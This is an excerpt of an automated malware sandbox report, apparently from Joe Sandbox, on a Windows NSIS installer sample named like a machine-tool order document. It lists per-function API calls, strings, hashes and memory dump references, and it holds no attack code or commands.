                                                                                                                                                                                                                          • Instruction ID: 8c4c774c716df1ba4ed4283b0a2f2a309b4ff87d1887d614af3d34fab0b2b326
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0ee348c889562484c3b768d13c3a93ebd41d4e0e75de75225554a952d4b9bcf2
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5A51B3B1A41214ABDF209F65DE89B9E7AB8EF00355F10403BF904B62D1C7BC9D418BAD
                                                                                                                                                                                                                          Function 00405D1F Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 199stringCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetVersion.KERNEL32(?,0041F500,00000000,00404F4E,0041F500,00000000), ref: 00405DD0
                                                                                                                                                                                                                          • GetSystemDirectoryA.KERNEL32(004226C0,00000400), ref: 00405E4B
                                                                                                                                                                                                                          • GetWindowsDirectoryA.KERNEL32(004226C0,00000400), ref: 00405E5E
                                                                                                                                                                                                                          • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 00405E9A
                                                                                                                                                                                                                          • SHGetPathFromIDListA.SHELL32(?,004226C0), ref: 00405EA8
                                                                                                                                                                                                                          • CoTaskMemFree.OLE32(?), ref: 00405EB3
                                                                                                                                                                                                                          • lstrcatA.KERNEL32(004226C0,\Microsoft\Internet Explorer\Quick Launch), ref: 00405ED5
                                                                                                                                                                                                                          • lstrlenA.KERNEL32(004226C0,?,0041F500,00000000,00404F4E,0041F500,00000000), ref: 00405F27
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • \Microsoft\Internet Explorer\Quick Launch, xrefs: 00405ECF
                                                                                                                                                                                                                          • Software\Microsoft\Windows\CurrentVersion, xrefs: 00405E1A
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5944530137.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944462931.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944599537.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944650329.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944704499.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                                                                                                                                                          • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                                                                                                          • API String ID: 900638850-730719616
                                                                                                                                                                                                                          • Opcode ID: 246001d013649ab9a3ce2bfd11c49aa2c3c379080efef8d0273f920e37356c73
                                                                                                                                                                                                                          • Instruction ID: 0882c4b3dedd804cc86cf07441b0505b0d3b9fa6fe4ef2b0f086a7f01eec187c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 246001d013649ab9a3ce2bfd11c49aa2c3c379080efef8d0273f920e37356c73
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D261F171A04A02ABDF209F24CC8877B3BA4EB55315F14813BE941BA2D0D27D4A42DF9E
                                                                                                                                                                                                                          Function 00403F49 Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetWindowLongA.USER32(?,000000EB), ref: 00403F66
                                                                                                                                                                                                                          • GetSysColor.USER32(00000000), ref: 00403F82
                                                                                                                                                                                                                          • SetTextColor.GDI32(?,00000000), ref: 00403F8E
                                                                                                                                                                                                                          • SetBkMode.GDI32(?,?), ref: 00403F9A
                                                                                                                                                                                                                          • GetSysColor.USER32(?), ref: 00403FAD
                                                                                                                                                                                                                          • SetBkColor.GDI32(?,?), ref: 00403FBD
                                                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 00403FD7
                                                                                                                                                                                                                          • CreateBrushIndirect.GDI32(?), ref: 00403FE1
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5944530137.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944462931.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944599537.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944650329.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944704499.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2320649405-0
                                                                                                                                                                                                                          • Opcode ID: 43ad35625e8825ecd6a842b2a86c8fc2a15ebd27dc521d874f6abe6132d0b03d
                                                                                                                                                                                                                          • Instruction ID: 69fcdb6fe5d9844d1d3a4f02655feb6370c96159658ebf8fe0858d801e39bc44
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 43ad35625e8825ecd6a842b2a86c8fc2a15ebd27dc521d874f6abe6132d0b03d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5A215471904705ABCB219F78DD48F4BBFF8AF01715B048A29F895E22E0D735EA04CB55
                                                                                                                                                                                                                          Function 00404F16 Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • lstrlenA.KERNEL32(0041F500,00000000,?,00000000,?,?,?,?,?,?,?,?,?,00402FCF,00000000,?), ref: 00404F4F
                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00402FCF,0041F500,00000000,?,00000000,?,?,?,?,?,?,?,?,?,00402FCF,00000000), ref: 00404F5F
                                                                                                                                                                                                                          • lstrcatA.KERNEL32(0041F500,00402FCF,00402FCF,0041F500,00000000,?,00000000), ref: 00404F72
                                                                                                                                                                                                                          • SetWindowTextA.USER32(0041F500,0041F500), ref: 00404F84
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404FAA
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FC4
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00001013,?,00000000), ref: 00404FD2
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5944530137.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944462931.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944599537.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944650329.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944704499.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2531174081-0
                                                                                                                                                                                                                          • Opcode ID: aa2ca8cd0db6689708325d6dbeadb1493f1866e87c71ac70f58748d5e232fe27
                                                                                                                                                                                                                          • Instruction ID: eca0c9fc351864773e3873b1aaef0297ce596284c077fb9535b250fc548d2f5f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: aa2ca8cd0db6689708325d6dbeadb1493f1866e87c71ac70f58748d5e232fe27
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0D219DB1900119BBDF119FA5CD849DEBFB9EF44354F14807AFA04B6290C7798A41CBA8
                                                                                                                                                                                                                          Function 004047E1 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 004047FC
                                                                                                                                                                                                                          • GetMessagePos.USER32 ref: 00404804
                                                                                                                                                                                                                          • ScreenToClient.USER32(?,?), ref: 0040481E
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404830
                                                                                                                                                                                                                          • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404856
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5944530137.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944462931.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944599537.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944650329.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944704499.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Message$Send$ClientScreen
                                                                                                                                                                                                                          • String ID: f
                                                                                                                                                                                                                          • API String ID: 41195575-1993550816
                                                                                                                                                                                                                          • Opcode ID: 31ce9a4f4114cdac1c56cc6e6a7041e0723a6b64a621d03b111e890c65b63bdb
                                                                                                                                                                                                                          • Instruction ID: 4b27695e280e242887da12c7cc5754773637cab379b52992c14d440b6ab19931
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 31ce9a4f4114cdac1c56cc6e6a7041e0723a6b64a621d03b111e890c65b63bdb
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4C018C76D00218BADB00EB94DC81BEFBBBCAB55711F10412BBA10B62C0C2B4A9018BA5
                                                                                                                                                                                                                          Function 00402B7F Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SetTimer.USER32(?,?,000000FA,00000000), ref: 00402B9A
                                                                                                                                                                                                                          • MulDiv.KERNEL32(?,00000064,?), ref: 00402BC5
                                                                                                                                                                                                                          • wsprintfA.USER32 ref: 00402BD5
                                                                                                                                                                                                                          • SetWindowTextA.USER32(?,?), ref: 00402BE5
                                                                                                                                                                                                                          • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402BF7
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • verifying installer: %d%%, xrefs: 00402BCF
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5944530137.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944462931.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944599537.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944650329.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944704499.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                                                                                                          • String ID: verifying installer: %d%%
                                                                                                                                                                                                                          • API String ID: 1451636040-82062127
                                                                                                                                                                                                                          • Opcode ID: 021b477a53d38e38848ae55fb8788b954c06de10666cf8d32c7124c9a6df8db9
                                                                                                                                                                                                                          • Instruction ID: 2606314667324be55f41e30219fef3bc9394611b5aff82d746d43452e3b9cc2b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 021b477a53d38e38848ae55fb8788b954c06de10666cf8d32c7124c9a6df8db9
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9901FF71540208BBEF109F60DD0AFEE3BB9EB04305F008039FA16B51E1D7B9A955DB59
                                                                                                                                                                                                                          Function 00111999 Relevance: 10.1, Strings: 8, Instructions: 119COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5943756624.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_110000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: D0/8$D0/8$D0/8$D0/8$F$F$F$F
                                                                                                                                                                                                                          • API String ID: 0-2996504180
                                                                                                                                                                                                                          • Opcode ID: 18738b2065d04d92eda542cd31a2dbd2fb9bcdcf8ce187697e0b2bf994c3e171
                                                                                                                                                                                                                          • Instruction ID: a000aba520b230596783598e20e4afa6fd8c6a74dcedb0ad83a0ea22e939b852
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 18738b2065d04d92eda542cd31a2dbd2fb9bcdcf8ce187697e0b2bf994c3e171
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 29419334A05349AFC70ADFF4C4526EEBBB2AF86304F1444B9D044AB395CB755A81CB92
                                                                                                                                                                                                                          Function 004026C6 Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040271A
                                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 00402736
                                                                                                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 0040276F
                                                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 00402782
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 0040279A
                                                                                                                                                                                                                          • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 004027AE
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5944530137.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944462931.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944599537.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944650329.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944704499.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2667972263-0
                                                                                                                                                                                                                          • Opcode ID: adc363f00f639a767efd08dcf3f901664e61a11698e839af0ef7c90e713b3076
                                                                                                                                                                                                                          • Instruction ID: c72a82ba9ad54cd79da2f6af8e35d97bfd0db4c8549b0f23667d21b619a0d1b1
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: adc363f00f639a767efd08dcf3f901664e61a11698e839af0ef7c90e713b3076
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9E215C71C01124BBCF216FA5DE89EAEBA79EF05324F10423AF910762E1C7794D418FA9
                                                                                                                                                                                                                          Function 00402E9F Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 155COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5944530137.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944462931.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944599537.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944650329.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944704499.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CountTick$wsprintf
                                                                                                                                                                                                                          • String ID: ... %d%%
                                                                                                                                                                                                                          • API String ID: 551687249-2449383134
                                                                                                                                                                                                                          • Opcode ID: fba2786afe0da618518007f80b73922ace53f2d67b6c3c46fda0480cb7e49c5e
                                                                                                                                                                                                                          • Instruction ID: 7e4dc47457cc3da2c56257e898c37067349407ab53618b81eea50406b68a50e3
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fba2786afe0da618518007f80b73922ace53f2d67b6c3c46fda0480cb7e49c5e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B9517C72902219ABDF10DF65DA04A9F7BB8EB40755F14413BF800B72C4C7789E51DBAA
                                                                                                                                                                                                                          Function 00405F68 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CharNextA.USER32(?,*?|<>/":,00000000,00429000,766B3410,0042A400,00000000,004030B4,0042A400,0042A400,004032CD), ref: 00405FC0
                                                                                                                                                                                                                          • CharNextA.USER32(?,?,?,00000000), ref: 00405FCD
                                                                                                                                                                                                                          • CharNextA.USER32(?,00429000,766B3410,0042A400,00000000,004030B4,0042A400,0042A400,004032CD), ref: 00405FD2
                                                                                                                                                                                                                          • CharPrevA.USER32(?,?,766B3410,0042A400,00000000,004030B4,0042A400,0042A400,004032CD), ref: 00405FE2
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5944530137.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944462931.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944599537.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944650329.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944704499.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Char$Next$Prev
                                                                                                                                                                                                                          • String ID: *?|<>/":
                                                                                                                                                                                                                          • API String ID: 589700163-165019052
                                                                                                                                                                                                                          • Opcode ID: 630e707e10dd61a13617e1da554c627d06d49c30f7de44bbd37dfc38f3dae12c
                                                                                                                                                                                                                          • Instruction ID: ae1ae60f73f04b2279d28dd2d3a2e9c8876d1ac92d72727c270a9fd7cf783979
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 630e707e10dd61a13617e1da554c627d06d49c30f7de44bbd37dfc38f3dae12c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 75119451908B932DEB3216254C44BBB7F99CF56760F18047BE9C4722C2D6BC9C429B7D
                                                                                                                                                                                                                          Function 004053DC Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CreateDirectoryA.KERNEL32(?,?,0042A400), ref: 0040541F
                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00405433
                                                                                                                                                                                                                          • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 00405448
                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00405452
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5944530137.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944462931.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944599537.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944650329.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944704499.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                                                                                                                                          • String ID: ,s@
                                                                                                                                                                                                                          • API String ID: 3449924974-3168275763
                                                                                                                                                                                                                          • Opcode ID: c1937cb38bbd103373e168b49ea038f7d2b8a7083c118a1d29bd15b4f0e45592
                                                                                                                                                                                                                          • Instruction ID: 949b07086bfbcc12ad21f83970ad7e8279e58ae06bb45438fc5c1603e332b0fc
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c1937cb38bbd103373e168b49ea038f7d2b8a7083c118a1d29bd15b4f0e45592
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2D010871D14259EADF119BA0DD447EFBFB8EB04355F004176E904B6181E3789648CFAA
                                                                                                                                                                                                                          Function 00406028 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 34libraryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0040603F
                                                                                                                                                                                                                          • wsprintfA.USER32 ref: 00406078
                                                                                                                                                                                                                          • LoadLibraryA.KERNEL32(?), ref: 00406088
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5944530137.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944462931.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944599537.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944650329.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944704499.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                                                                                                                          • String ID: %s%s.dll$\
                                                                                                                                                                                                                          • API String ID: 2200240437-500877883
                                                                                                                                                                                                                          • Opcode ID: 1d5f31d115a59bc75170d0b5e25867174e87b8d420fe74ce0eee88fcfc4f8209
                                                                                                                                                                                                                          • Instruction ID: d5163558ffe5aed4278454506076ff52b4f001f8688a9739bf5e409abac40a62
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1d5f31d115a59bc75170d0b5e25867174e87b8d420fe74ce0eee88fcfc4f8209
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C6F0BB7094010A9BDF15DB78DC0DEFB365CEB08304F14057AA547E10D2EA79E975CBA9
                                                                                                                                                                                                                          Function 00401751 Relevance: 7.6, APIs: 5, Instructions: 147stringtimeCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,00000000,00409400,00429800,00000000,00000000,00000031), ref: 00401790
                                                                                                                                                                                                                          • CompareFileTime.KERNEL32(-00000014,?,00409400,00409400,00000000,00000000,00409400,00429800,00000000,00000000,00000031), ref: 004017BA
                                                                                                                                                                                                                            • Part of subcall function 00405CFD: lstrcpynA.KERNEL32(?,?,00000400,0040318B,00422F20,NSIS Error), ref: 00405D0A
                                                                                                                                                                                                                            • Part of subcall function 00404F16: lstrlenA.KERNEL32(0041F500,00000000,?,00000000,?,?,?,?,?,?,?,?,?,00402FCF,00000000,?), ref: 00404F4F
                                                                                                                                                                                                                            • Part of subcall function 00404F16: lstrlenA.KERNEL32(00402FCF,0041F500,00000000,?,00000000,?,?,?,?,?,?,?,?,?,00402FCF,00000000), ref: 00404F5F
                                                                                                                                                                                                                            • Part of subcall function 00404F16: lstrcatA.KERNEL32(0041F500,00402FCF,00402FCF,0041F500,00000000,?,00000000), ref: 00404F72
                                                                                                                                                                                                                            • Part of subcall function 00404F16: SetWindowTextA.USER32(0041F500,0041F500), ref: 00404F84
                                                                                                                                                                                                                            • Part of subcall function 00404F16: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404FAA
                                                                                                                                                                                                                            • Part of subcall function 00404F16: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FC4
                                                                                                                                                                                                                            • Part of subcall function 00404F16: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404FD2
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5944530137.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944462931.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944599537.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944650329.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944704499.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1941528284-0
                                                                                                                                                                                                                          • Opcode ID: 36670ec199ee9b6dfad8f4a6b6b31581e8d9c48027d88929eec7ba2c2c4230c4
